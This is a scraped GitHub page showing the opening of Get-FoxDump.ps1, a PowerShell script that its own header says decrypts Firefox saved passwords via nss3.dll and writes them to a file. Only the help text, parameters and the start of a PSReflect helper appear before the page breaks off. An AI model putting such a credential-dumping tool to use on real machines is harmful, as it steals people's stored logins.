aria-hidden=\"true\" class=\"octicon octicon-git-pull-request\" height=\"16\" version=\"1.1\" viewBox=\"0 0 12 16\" width=\"12\"><path fill-rule=\"evenodd\" d=\"M11 11.28V5c-.03-.78-.34-1.47-.94-2.06C9.46 2.35 8.78 2.03 8 2H7V0L4 3l3 3V4h1c.27.02.48.11.69.31.21.2.3.42.31.69v6.28A1.993 1.993 0 0 0 10 15a1.993 1.993 0 0 0 1-3.72zm-1 2.92c-.66 0-1.2-.55-1.2-1.2 0-.65.55-1.2 1.2-1.2.65 0 1.2.55 1.2 1.2 0 .65-.55 1.2-1.2 1.2zM4 3c0-1.11-.89-2-2-2a1.993 1.993 0 0 0-1 3.72v6.56A1.993 1.993 0 0 0 2 15a1.993 1.993 0 0 0 1-3.72V4.72c.59-.34 1-.98 1-1.72zm-.8 10c0 .66-.55 1.2-1.2 1.2-.65 0-1.2-.55-1.2-1.2 0-.65.55-1.2 1.2-1.2.65 0 1.2.55 1.2 1.2zM2 4.2C1.34 4.2.8 3.65.8 3c0-.65.55-1.2 1.2-1.2.65 0 1.2.55 1.2 1.2 0 .65-.55 1.2-1.2 1.2z\"/></svg>\n      <span itemprop=\"name\">Pull requests</span>\n      <span class=\"Counter\">0</span>\n      <meta itemprop=\"position\" content=\"3\">\n</a>  </span>\n\n    <a href=\"/xorrior/RandomPS-Scripts/projects\" class=\"js-selected-navigation-item reponav-item\" data-selected-links=\"repo_projects new_repo_project repo_project /xorrior/RandomPS-Scripts/projects\">\n      <svg aria-hidden=\"true\" class=\"octicon octicon-project\" height=\"16\" version=\"1.1\" viewBox=\"0 0 15 16\" width=\"15\"><path fill-rule=\"evenodd\" d=\"M10 12h3V2h-3v10zm-4-2h3V2H6v8zm-4 4h3V2H2v12zm-1 1h13V1H1v14zM14 0H1a1 1 0 0 0-1 1v14a1 1 0 0 0 1 1h13a1 1 0 0 0 1-1V1a1 1 0 0 0-1-1z\"/></svg>\n      Projects\n      <span class=\"Counter\" >0</span>\n</a>\n\n\n  <a href=\"/xorrior/RandomPS-Scripts/pulse\" class=\"js-selected-navigation-item reponav-item\" data-selected-links=\"pulse /xorrior/RandomPS-Scripts/pulse\">\n    <svg aria-hidden=\"true\" class=\"octicon octicon-pulse\" height=\"16\" version=\"1.1\" viewBox=\"0 0 14 16\" width=\"14\"><path fill-rule=\"evenodd\" d=\"M11.5 8L8.8 5.4 6.6 8.5 5.5 1.6 2.38 8H0v2h3.6l.9-1.8.9 5.4L9 8.5l1.6 1.5H14V8z\"/></svg>\n    Pulse\n</a>\n  <a href=\"/xorrior/RandomPS-Scripts/graphs\" class=\"js-selected-navigation-item reponav-item\" data-selected-links=\"repo_graphs repo_contributors /xorrior/RandomPS-Scripts/graphs\">\n    <svg aria-hidden=\"true\" class=\"octicon octicon-graph\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M16 14v1H0V0h1v14h15zM5 13H3V8h2v5zm4 0H7V3h2v10zm4 0h-2V6h2v7z\"/></svg>\n    Graphs\n</a>\n\n</nav>\n\n    </div>\n  </div>\n\n<div class=\"container new-discussion-timeline experiment-repo-nav\">\n  <div class=\"repository-content\">\n\n    \n          \n\n<a href=\"/xorrior/RandomPS-Scripts/blob/e4bef9dfa4da1cf1e1ec084158083602fd4631a2/Get-FoxDump.ps1\" class=\"d-none js-permalink-shortcut\" data-hotkey=\"y\">Permalink</a>\n\n<!-- blob contrib key: blob_contributors:v21:c15dce06a01beccab88162a968d64147 -->\n\n<div class=\"file-navigation js-zeroclipboard-container\">\n  \n<div class=\"select-menu branch-select-menu js-menu-container js-select-menu float-left\">\n  <button class=\" btn btn-sm select-menu-button js-menu-target css-truncate\" data-hotkey=\"w\"\n    \n    type=\"button\" aria-label=\"Switch branches or tags\" tabindex=\"0\" aria-haspopup=\"true\">\n      <i>Branch:</i>\n      <span class=\"js-select-button css-truncate-target\">master</span>\n  </button>\n\n  <div class=\"select-menu-modal-holder js-menu-content js-navigation-container\" data-pjax>\n\n    <div class=\"select-menu-modal\">\n      <div class=\"select-menu-header\">\n        <svg aria-label=\"Close\" class=\"octicon octicon-x js-menu-close\" height=\"16\" role=\"img\" version=\"1.1\" viewBox=\"0 0 12 16\" width=\"12\"><path fill-rule=\"evenodd\" d=\"M7.48 8l3.75 3.75-1.48 1.48L6 9.48l-3.75 3.75-1.48-1.48L4.52 8 .77 4.25l1.48-1.48L6 6.52l3.75-3.75 1.48 1.48z\"/></svg>\n        <span class=\"select-menu-title\">Switch branches/tags</span>\n      </div>\n\n      <div class=\"select-menu-filters\">\n        <div class=\"select-menu-text-filter\">\n          <input type=\"text\" aria-label=\"Filter branches/tags\" id=\"context-commitish-filter-field\" class=\"form-control js-filterable-field js-navigation-enable\" placeholder=\"Filter branches/tags\">\n        </div>\n        <div class=\"select-menu-tabs\">\n          <ul>\n            <li class=\"select-menu-tab\">\n              <a href=\"#\" data-tab-filter=\"branches\" data-filter-placeholder=\"Filter branches/tags\" class=\"js-select-menu-tab\" role=\"tab\">Branches</a>\n            </li>\n            <li class=\"select-menu-tab\">\n              <a href=\"#\" data-tab-filter=\"tags\" data-filter-placeholder=\"Find a tag…\" class=\"js-select-menu-tab\" role=\"tab\">Tags</a>\n            </li>\n          </ul>\n        </div>\n      </div>\n\n      <div class=\"select-menu-list select-menu-tab-bucket js-select-menu-tab-bucket\" data-tab-filter=\"branches\" role=\"menu\">\n\n        <div data-filterable-for=\"context-commitish-filter-field\" data-filterable-type=\"substring\">\n\n\n            <a class=\"select-menu-item js-navigation-item js-navigation-open selected\"\n               href=\"/xorrior/RandomPS-Scripts/blob/master/Get-FoxDump.ps1\"\n               data-name=\"master\"\n               data-skip-pjax=\"true\"\n               rel=\"nofollow\">\n              <svg aria-hidden=\"true\" class=\"octicon octicon-check select-menu-item-icon\" height=\"16\" version=\"1.1\" viewBox=\"0 0 12 16\" width=\"12\"><path fill-rule=\"evenodd\" d=\"M12 5l-8 8-4-4 1.5-1.5L4 10l6.5-6.5z\"/></svg>\n              <span class=\"select-menu-item-text css-truncate-target js-select-menu-filter-text\">\n                master\n              </span>\n            </a>\n            <a class=\"select-menu-item js-navigation-item js-navigation-open \"\n               href=\"/xorrior/RandomPS-Scripts/blob/revert-6-development/Get-FoxDump.ps1\"\n               data-name=\"revert-6-development\"\n               data-skip-pjax=\"true\"\n               rel=\"nofollow\">\n              <svg aria-hidden=\"true\" class=\"octicon octicon-check select-menu-item-icon\" height=\"16\" version=\"1.1\" viewBox=\"0 0 12 16\" width=\"12\"><path fill-rule=\"evenodd\" d=\"M12 5l-8 8-4-4 1.5-1.5L4 10l6.5-6.5z\"/></svg>\n              <span class=\"select-menu-item-text css-truncate-target js-select-menu-filter-text\">\n                revert-6-development\n              </span>\n            </a>\n        </div>\n\n          <div class=\"select-menu-no-results\">Nothing to show</div>\n      </div>\n\n      <div class=\"select-menu-list select-menu-tab-bucket js-select-menu-tab-bucket\" data-tab-filter=\"tags\">\n        <div data-filterable-for=\"context-commitish-filter-field\" data-filterable-type=\"substring\">\n\n\n        </div>\n\n        <div class=\"select-menu-no-results\">Nothing to show</div>\n      </div>\n\n    </div>\n  </div>\n</div>\n\n  <div class=\"BtnGroup float-right\">\n    <a href=\"/xorrior/RandomPS-Scripts/find/master\"\n          class=\"js-pjax-capture-input btn btn-sm BtnGroup-item\"\n          data-pjax\n          data-hotkey=\"t\">\n      Find file\n    </a>\n    <button aria-label=\"Copy file path to clipboard\" class=\"js-zeroclipboard btn btn-sm BtnGroup-item tooltipped tooltipped-s\" data-copied-hint=\"Copied!\" type=\"button\">Copy path</button>\n  </div>\n  <div class=\"breadcrumb js-zeroclipboard-target\">\n    <span class=\"repo-root js-repo-root\"><span class=\"js-path-segment\"><a href=\"/xorrior/RandomPS-Scripts\"><span>RandomPS-Scripts</span></a></span></span><span class=\"separator\">/</span><strong class=\"final-path\">Get-FoxDump.ps1</strong>\n  </div>\n</div>\n\n\n\n  <div class=\"commit-tease\">\n      <span class=\"float-right\">\n        <a class=\"commit-tease-sha\" href=\"/xorrior/RandomPS-Scripts/commit/f99c392f0b37d8b3f11e538a429604b4cc152a45\" data-pjax>\n          f99c392\n        </a>\n        <relative-time datetime=\"2017-01-03T03:48:45Z\">Jan 3, 2017</relative-time>\n      </span>\n      <div>\n        <img alt=\"@xorrior\" class=\"avatar\" height=\"20\" src=\"https://avatars0.githubusercontent.com/u/9156069?v=3&amp;s=40\" width=\"20\" />\n        <a href=\"/xorrior\" class=\"user-mention\" rel=\"author\">xorrior</a>\n          <a href=\"/xorrior/RandomPS-Scripts/commit/f99c392f0b37d8b3f11e538a429604b4cc152a45\" class=\"message\" data-pjax=\"true\" title=\"Added license\n\nAdded License\">Added license</a>\n      </div>\n\n    <div class=\"commit-tease-contributors\">\n      <button type=\"button\" class=\"btn-link muted-link contributors-toggle\" data-facebox=\"#blob_contributors_box\">\n        <strong>1</strong>\n         contributor\n      </button>\n      \n    </div>\n\n    <div id=\"blob_contributors_box\" style=\"display:none\">\n      <h2 class=\"facebox-header\" data-facebox-id=\"facebox-header\">Users who have contributed to this file</h2>\n      <ul class=\"facebox-user-list\" data-facebox-id=\"facebox-description\">\n          <li class=\"facebox-user-list-item\">\n            <img alt=\"@xorrior\" height=\"24\" src=\"https://avatars2.githubusercontent.com/u/9156069?v=3&amp;s=48\" width=\"24\" />\n            <a href=\"/xorrior\">xorrior</a>\n          </li>\n      </ul>\n    </div>\n  </div>\n\n<div class=\"file\">\n  <div class=\"file-header\">\n  <div class=\"file-actions\">\n\n    <div class=\"BtnGroup\">\n      <a href=\"/xorrior/RandomPS-Scripts/raw/master/Get-FoxDump.ps1\" class=\"btn btn-sm BtnGroup-item\" id=\"raw-url\">Raw</a>\n        <a href=\"/xorrior/RandomPS-Scripts/blame/master/Get-FoxDump.ps1\" class=\"btn btn-sm js-update-url-with-hash BtnGroup-item\" data-hotkey=\"b\">Blame</a>\n      <a href=\"/xorrior/RandomPS-Scripts/commits/master/Get-FoxDump.ps1\" class=\"btn btn-sm BtnGroup-item\" rel=\"nofollow\">History</a>\n    </div>\n\n\n        <button type=\"button\" class=\"btn-octicon disabled tooltipped tooltipped-nw\"\n          aria-label=\"You must be signed in to make or propose changes\">\n          <svg aria-hidden=\"true\" class=\"octicon octicon-pencil\" height=\"16\" version=\"1.1\" viewBox=\"0 0 14 16\" width=\"14\"><path fill-rule=\"evenodd\" d=\"M0 12v3h3l8-8-3-3-8 8zm3 2H1v-2h1v1h1v1zm10.3-9.3L12 6 9 3l1.3-1.3a.996.996 0 0 1 1.41 0l1.59 1.59c.39.39.39 1.02 0 1.41z\"/></svg>\n        </button>\n        <button type=\"button\" class=\"btn-octicon btn-octicon-danger disabled tooltipped tooltipped-nw\"\n          aria-label=\"You must be signed in to make or propose changes\">\n          <svg aria-hidden=\"true\" class=\"octicon octicon-trashcan\" height=\"16\" version=\"1.1\" viewBox=\"0 0 12 16\" width=\"12\"><path fill-rule=\"evenodd\" d=\"M11 2H9c0-.55-.45-1-1-1H5c-.55 0-1 .45-1 1H2c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1v9c0 .55.45 1 1 1h7c.55 0 1-.45 1-1V5c.55 0 1-.45 1-1V3c0-.55-.45-1-1-1zm-1 12H3V5h1v8h1V5h1v8h1V5h1v8h1V5h1v9zm1-10H2V3h9v1z\"/></svg>\n        </button>\n  </div>\n\n  <div class=\"file-info\">\n      963 lines (736 sloc)\n      <span class=\"file-info-divider\"></span>\n    31.5 KB\n  </div>\n</div>\n\n  \n\n  <div itemprop=\"text\" class=\"blob-wrapper data type-powershell\">\n      <table class=\"highlight tab-size js-file-line-container\" data-tab-size=\"8\">\n      <tr>\n        <td id=\"L1\" class=\"blob-num js-line-number\" data-line-number=\"1\"></td>\n        <td id=\"LC1\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-k\">Function</span> <span class=\"pl-en\">Get-FoxDump</span> </td>\n      </tr>\n      <tr>\n        <td id=\"L2\" class=\"blob-num js-line-number\" data-line-number=\"2\"></td>\n        <td id=\"LC2\" class=\"blob-code blob-code-inner js-file-line\">{</td>\n      </tr>\n      <tr>\n        <td id=\"L3\" class=\"blob-num js-line-number\" data-line-number=\"3\"></td>\n        <td id=\"LC3\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-c\">&lt;#</span></td>\n      </tr>\n      <tr>\n        <td id=\"L4\" class=\"blob-num js-line-number\" data-line-number=\"4\"></td>\n        <td id=\"LC4\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">SYNOPSIS</span></span> </span></td>\n      </tr>\n      <tr>\n        <td id=\"L5\" class=\"blob-num js-line-number\" data-line-number=\"5\"></td>\n        <td id=\"LC5\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    This script will utilize the api functions within the nss3.dll to decrypt saved passwords. This will only be successfull if the masterpassword has not been set.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L6\" class=\"blob-num js-line-number\" data-line-number=\"6\"></td>\n        <td id=\"LC6\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L7\" class=\"blob-num js-line-number\" data-line-number=\"7\"></td>\n        <td id=\"LC7\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">DESCRIPTION</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L8\" class=\"blob-num js-line-number\" data-line-number=\"8\"></td>\n        <td id=\"LC8\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    This script will utilize the api functions within the nss3.dll to decrypt saved passwords and output them to the pipeline. This will only be successfull if the master </span></td>\n      </tr>\n      <tr>\n        <td id=\"L9\" class=\"blob-num js-line-number\" data-line-number=\"9\"></td>\n        <td id=\"LC9\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    password has not been set. The results will include the username, password, and form submit url. This script should work with Firefox version 32 and above. Earlier</span></td>\n      </tr>\n      <tr>\n        <td id=\"L10\" class=\"blob-num js-line-number\" data-line-number=\"10\"></td>\n        <td id=\"LC10\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    versions utilized a different storage method for passwords. </span></td>\n      </tr>\n      <tr>\n        <td id=\"L11\" class=\"blob-num js-line-number\" data-line-number=\"11\"></td>\n        <td id=\"LC11\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L12\" class=\"blob-num js-line-number\" data-line-number=\"12\"></td>\n        <td id=\"LC12\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">PARAMETER</span> <span class=\"pl-k\">OutFile</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L13\" class=\"blob-num js-line-number\" data-line-number=\"13\"></td>\n        <td id=\"LC13\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    Path to the file where the results should be written to. </span></td>\n      </tr>\n      <tr>\n        <td id=\"L14\" class=\"blob-num js-line-number\" data-line-number=\"14\"></td>\n        <td id=\"LC14\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L15\" class=\"blob-num js-line-number\" data-line-number=\"15\"></td>\n        <td id=\"LC15\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">EXAMPLE</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L16\" class=\"blob-num js-line-number\" data-line-number=\"16\"></td>\n        <td id=\"LC16\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L17\" class=\"blob-num js-line-number\" data-line-number=\"17\"></td>\n        <td id=\"LC17\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    Get-FoxDump -OutFile &quot;passwords.txt&quot; </span></td>\n      </tr>\n      <tr>\n        <td id=\"L18\" class=\"blob-num js-line-number\" data-line-number=\"18\"></td>\n        <td id=\"LC18\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L19\" class=\"blob-num js-line-number\" data-line-number=\"19\"></td>\n        <td id=\"LC19\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    This will retrieve any saved passwords in firefox and then write them out to a file name passwords.txt. </span></td>\n      </tr>\n      <tr>\n        <td id=\"L20\" class=\"blob-num js-line-number\" data-line-number=\"20\"></td>\n        <td id=\"LC20\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L21\" class=\"blob-num js-line-number\" data-line-number=\"21\"></td>\n        <td id=\"LC21\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    Author: Christopher Ross (@xorrior)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L22\" class=\"blob-num js-line-number\" data-line-number=\"22\"></td>\n        <td id=\"LC22\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    License: BSD 3-Clause</span></td>\n      </tr>\n      <tr>\n        <td id=\"L23\" class=\"blob-num js-line-number\" data-line-number=\"23\"></td>\n        <td id=\"LC23\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L24\" class=\"blob-num js-line-number\" data-line-number=\"24\"></td>\n        <td id=\"LC24\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    #&gt;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L25\" class=\"blob-num js-line-number\" data-line-number=\"25\"></td>\n        <td id=\"LC25\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L26\" class=\"blob-num js-line-number\" data-line-number=\"26\"></td>\n        <td id=\"LC26\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-c\">#References: http://xakfor.net/threads/c-firefox-36-password-cookie-recovery.12192/</span></td>\n      </tr>\n      <tr>\n        <td id=\"L27\" class=\"blob-num js-line-number\" data-line-number=\"27\"></td>\n        <td id=\"LC27\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L28\" class=\"blob-num js-line-number\" data-line-number=\"28\"></td>\n        <td id=\"LC28\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-ent\">[CmdletBindin<span class=\"pl-ent\">g</span></span><span class=\"pl-e\">()</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L29\" class=\"blob-num js-line-number\" data-line-number=\"29\"></td>\n        <td id=\"LC29\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">param</span></td>\n      </tr>\n      <tr>\n        <td id=\"L30\" class=\"blob-num js-line-number\" data-line-number=\"30\"></td>\n        <td id=\"LC30\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">(</span></td>\n      </tr>\n      <tr>\n        <td id=\"L31\" class=\"blob-num js-line-number\" data-line-number=\"31\"></td>\n        <td id=\"LC31\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Mandatory</span> =<span class=\"pl-smi\"> $False</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L32\" class=\"blob-num js-line-number\" data-line-number=\"32\"></td>\n        <td id=\"LC32\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-e\">[string]</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">OutFile</span></td>\n      </tr>\n      <tr>\n        <td id=\"L33\" class=\"blob-num js-line-number\" data-line-number=\"33\"></td>\n        <td id=\"LC33\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L34\" class=\"blob-num js-line-number\" data-line-number=\"34\"></td>\n        <td id=\"LC34\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L35\" class=\"blob-num js-line-number\" data-line-number=\"35\"></td>\n        <td id=\"LC35\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-c\">#PSREFLECT CODE</span></td>\n      </tr>\n      <tr>\n        <td id=\"L36\" class=\"blob-num js-line-number\" data-line-number=\"36\"></td>\n        <td id=\"LC36\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">function</span> <span class=\"pl-en\">New-InMemoryModule</span></td>\n      </tr>\n      <tr>\n        <td id=\"L37\" class=\"blob-num js-line-number\" data-line-number=\"37\"></td>\n        <td id=\"LC37\" class=\"blob-code blob-code-inner js-file-line\">  {</td>\n      </tr>\n      <tr>\n        <td id=\"L38\" class=\"blob-num js-line-number\" data-line-number=\"38\"></td>\n        <td id=\"LC38\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-c\">&lt;#</span></td>\n      </tr>\n      <tr>\n        <td id=\"L39\" class=\"blob-num js-line-number\" data-line-number=\"39\"></td>\n        <td id=\"LC39\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">SYNOPSIS</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L40\" class=\"blob-num js-line-number\" data-line-number=\"40\"></td>\n        <td id=\"LC40\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L41\" class=\"blob-num js-line-number\" data-line-number=\"41\"></td>\n        <td id=\"LC41\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    Creates an in-memory assembly and module</span></td>\n      </tr>\n      <tr>\n        <td id=\"L42\" class=\"blob-num js-line-number\" data-line-number=\"42\"></td>\n        <td id=\"LC42\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L43\" class=\"blob-num js-line-number\" data-line-number=\"43\"></td>\n        <td id=\"LC43\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    Author: Matthew Graeber (@mattifestation)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L44\" class=\"blob-num js-line-number\" data-line-number=\"44\"></td>\n        <td id=\"LC44\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    License: BSD 3-Clause</span></td>\n      </tr>\n      <tr>\n        <td id=\"L45\" class=\"blob-num js-line-number\" data-line-number=\"45\"></td>\n        <td id=\"LC45\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    Required Dependencies: None</span></td>\n      </tr>\n      <tr>\n        <td id=\"L46\" class=\"blob-num js-line-number\" data-line-number=\"46\"></td>\n        <td id=\"LC46\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    Optional Dependencies: None</span></td>\n      </tr>\n      <tr>\n        <td id=\"L47\" class=\"blob-num js-line-number\" data-line-number=\"47\"></td>\n        <td id=\"LC47\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"> </span></td>\n      </tr>\n      <tr>\n        <td id=\"L48\" class=\"blob-num js-line-number\" data-line-number=\"48\"></td>\n        <td id=\"LC48\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">DESCRIPTION</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L49\" class=\"blob-num js-line-number\" data-line-number=\"49\"></td>\n        <td id=\"LC49\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L50\" class=\"blob-num js-line-number\" data-line-number=\"50\"></td>\n        <td id=\"LC50\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    When defining custom enums, structs, and unmanaged functions, it is</span></td>\n      </tr>\n      <tr>\n        <td id=\"L51\" class=\"blob-num js-line-number\" data-line-number=\"51\"></td>\n        <td id=\"LC51\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    necessary to associate to an assembly module. This helper function</span></td>\n      </tr>\n      <tr>\n        <td id=\"L52\" class=\"blob-num js-line-number\" data-line-number=\"52\"></td>\n        <td id=\"LC52\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    creates an in-memory module that can be passed to the &#39;enum&#39;,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L53\" class=\"blob-num js-line-number\" data-line-number=\"53\"></td>\n        <td id=\"LC53\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    &#39;struct&#39;, and Add-Win32Type functions.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L54\" class=\"blob-num js-line-number\" data-line-number=\"54\"></td>\n        <td id=\"LC54\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L55\" class=\"blob-num js-line-number\" data-line-number=\"55\"></td>\n        <td id=\"LC55\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">PARAMETER</span> <span class=\"pl-k\">ModuleName</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L56\" class=\"blob-num js-line-number\" data-line-number=\"56\"></td>\n        <td id=\"LC56\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L57\" class=\"blob-num js-line-number\" data-line-number=\"57\"></td>\n        <td id=\"LC57\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    Specifies the desired name for the in-memory assembly and module. If</span></td>\n      </tr>\n      <tr>\n        <td id=\"L58\" class=\"blob-num js-line-number\" data-line-number=\"58\"></td>\n        <td id=\"LC58\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    ModuleName is not provided, it will default to a GUID.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L59\" class=\"blob-num js-line-number\" data-line-number=\"59\"></td>\n        <td id=\"LC59\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L60\" class=\"blob-num js-line-number\" data-line-number=\"60\"></td>\n        <td id=\"LC60\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">    <span class=\"pl-c1\">.</span><span class=\"pl-k\">EXAMPLE</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L61\" class=\"blob-num js-line-number\" data-line-number=\"61\"></td>\n        <td id=\"LC61\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L62\" class=\"blob-num js-line-number\" data-line-number=\"62\"></td>\n        <td id=\"LC62\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    $Module = New-InMemoryModule -ModuleName Win32</span></td>\n      </tr>\n      <tr>\n        <td id=\"L63\" class=\"blob-num js-line-number\" data-line-number=\"63\"></td>\n        <td id=\"LC63\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">    #&gt;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L64\" class=\"blob-num js-line-number\" data-line-number=\"64\"></td>\n        <td id=\"LC64\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L65\" class=\"blob-num js-line-number\" data-line-number=\"65\"></td>\n        <td id=\"LC65\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">Param</span></td>\n      </tr>\n      <tr>\n        <td id=\"L66\" class=\"blob-num js-line-number\" data-line-number=\"66\"></td>\n        <td id=\"LC66\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">(</span></td>\n      </tr>\n      <tr>\n        <td id=\"L67\" class=\"blob-num js-line-number\" data-line-number=\"67\"></td>\n        <td id=\"LC67\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Position</span> =<span class=\"pl-smi\"> 0</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L68\" class=\"blob-num js-line-number\" data-line-number=\"68\"></td>\n        <td id=\"LC68\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[ValidateNotNullOrEmpt<span class=\"pl-ent\">y</span></span><span class=\"pl-e\">()</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L69\" class=\"blob-num js-line-number\" data-line-number=\"69\"></td>\n        <td id=\"LC69\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[String]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L70\" class=\"blob-num js-line-number\" data-line-number=\"70\"></td>\n        <td id=\"LC70\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">ModuleName</span> <span class=\"pl-k\">=</span> <span 